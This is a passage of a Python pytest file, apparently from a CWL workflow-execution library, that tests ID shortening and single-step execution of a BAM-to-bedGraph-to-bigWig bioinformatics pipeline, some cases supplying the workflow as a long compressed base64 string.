"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"bam_to_bedgraph/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"bam_to_bedgraph/run/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
None,
"bam_to_bedgraph/genome_coverage_file"
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
None,
"bam_to_bedgraph"
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
None,
True,
"genome_coverage_file"
),
(
"bam_to_bedgraph/run/command/9d930026-6d03-4cef-aa56-d07616e1e739/genome_coverage_file",
True,
True,
""
),
(
"output_filename",
None,
None,
"output_filename"
),
(
"output_filename",
True,
None,
"output_filename"
),
(
"output_filename",
None,
True,
"output_filename"
),
(
"output_filename",
True,
True,
"output_filename"
)
]
)
def test_get_short_id(long_id, only_step_name, only_id, control):
    """get_short_id should shorten long_id exactly to the control value."""
    shortened = get_short_id(long_id, only_step_name, only_id)
    assert shortened == control, "Test failed"
# It's also indirect testing of fast_cwl_step_load
@pytest.mark.parametrize(
"workflow, job, task_id, skipped_control",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
# bam-bedgraph-bigwig-single.cwl
"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 zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG",
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"sort-bedgraph-step.json",
"sort_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-conditional.cwl"],
"sort-bedgraph-step-conditional-false.json",
"sort_bedgraph",
True
),
(
["workflows", "bam-bedgraph-bigwig-conditional.cwl"],
"sort-bedgraph-step-conditional-true.json",
"sort_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"sorted-bedgraph-to-bigwig-step.json",
"sorted_bedgraph_to_bigwig",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"sort-bedgraph-step.json",
"sort_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"sorted-bedgraph-to-bigwig-step.json",
"sorted_bedgraph_to_bigwig",
False
),
(
["workflows", "bam-bedgraph-bigwig-subworkflow.cwl"],
"bam-bedgraph-bigwig.json",
"subworkflow",
False
)
]
)
def test_execute_workflow_step(workflow, job, task_id, skipped_control):
    """Execute one step of a workflow and compare the "skipped" flag.

    "workflow" is either a list of path components relative to
    DATA_FOLDER or a str with compressed workflow content that is
    passed through as is.
    """
    pickle_folder = tempfile.mkdtemp()
    # str means already-compressed workflow content, not path components;
    # dropped redundant parentheses around isinstance check
    workflow_path = (
        workflow if isinstance(workflow, str)
        else os.path.join(DATA_FOLDER, *workflow)
    )
    job_path = os.path.join(DATA_FOLDER, "jobs", job)
    cwl_args = {"pickle_folder": pickle_folder}
    job_data = load_job(
        workflow=workflow_path,
        job=job_path,
        cwl_args=cwl_args
    )
    job_data["tmp_folder"] = pickle_folder  # need manually add "tmp_folder"
    try:
        step_outputs, step_report, skipped = execute_workflow_step(
            workflow=workflow_path,
            task_id=task_id,
            job_data=job_data,
            cwl_args=cwl_args
        )
        if skipped != skipped_control:
            raise ValueError("Workflow didn't follow skipping rule")
    except ValueError as err:
        assert False, f"Failed to execute the workflow. \n {err}"
    except BaseException as err:
        assert False, f"Failed to run the test. \n {err}"
    finally:
        shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"job, workflow",
[
(
"bam-bedgraph-bigwig.json",
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
"bam-bedgraph-bigwig.json",
# bam-bedgraph-bigwig-single.cwl
"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\
